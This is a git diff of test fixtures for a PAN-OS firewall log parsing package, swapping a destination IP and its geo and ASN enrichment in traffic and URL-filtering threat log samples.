"name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 78, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13478,7 +13520,7 @@ }, "packets": 3 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "panw": { "panos": { "ruleset": "rule1", @@ -13512,7 +13554,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "community_id": "1:vRVo2Gp1oNRBcvj5NtWtblslqFk=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13550,14 +13592,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284404508Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "ingested": "2021-12-09T13:43:22.382145100Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,27111,1,59276,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13580,27 +13622,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 78, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -13619,7 +13660,7 @@ }, "packets": 3 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "panw": { "panos": { "ruleset": "rule1", @@ -13653,7 +13694,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "community_id": "1:g+OW2rFxOQFbjQiQ/fw145Cfric=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13691,14 +13732,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284409018Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", + "ingested": "2021-12-09T13:43:22.382150400Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,25398,1,59275,80,0,0,0x200000,tcp,allow,429,351,78,4,2012/04/10 04:39:47,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,3,1", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -13721,27 +13762,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -13760,7 +13800,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -13794,7 +13834,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/0xM0KlMLwieymkDApfqS3/WWiQ=", + "community_id": "1:iXmhRxdINxEmOXTjxHfTv8gVn1o=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -13832,14 +13872,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284413692Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.382155700Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,TRAFFIC,start,1,2012/04/10 04:39:46,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,23898,1,59274,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:46,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json index c4462133e3c..d41d8818ef9 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json @@ -12,7 +12,7 @@ "pan-os", "forwarded" ], - "message": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0" + "message": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0" } ] } \ No newline at end of file diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json index 0e9e7d19607..f827ed55787 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic.json-expected.json @@ -10,27 +10,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -49,7 +48,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -83,7 +82,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:MaqerLAYuvMg6JWjWKmIMO6QJ6s=", + "community_id": "1:yr/t+D7vuUqVI0fdtRb/nP4gu7g=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -121,14 +120,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:39:10.095239550Z", - "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:44.429582400Z", + "original": "Oct 30 09:46:12 1,2012/10/30 09:46:12,01606001116,TRAFFIC,start,1,2012/04/10 04:39:58,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:59,11449,1,59324,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:59,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:12.000-04:00", "timezone": "America/New_York", "kind": "event", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log index 2b6854cf5a5..2c3b2c1917b 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-threat-sample.log @@ -1,76 +1,76 @@ -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28191,1,52984,443,37679,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7726,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28219,1,52983,443,28249,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7727,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27723,1,52986,443,63898,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7728,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28172,1,52985,443,7515,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7729,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28151,1,52987,443,3225,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7730,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28076,1,52988,443,60449,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7731,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28173,1,52990,443,60559,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7732,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28186,1,52989,443,47414,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7733,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28192,1,52992,443,37673,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7734,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:36 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,27011,1,52991,443,8232,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7735,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28240,1,52994,443,32982,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7736,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28143,1,52993,443,10473,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7737,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28272,1,52995,443,20446,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7738,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28146,1,52996,443,34699,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7739,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:36,012801096514,THREAT,url,2049,2018/11/30 16:44:36,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:36,28278,1,52997,443,22820,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7740,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,23.72.137.131,192.168.1.63,23.72.137.131,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,"b.scorecardresearch.com/",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,"consent.cmp.oath.com/",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295, -Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,152.195.55.192,192.168.1.63,152.195.55.192,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 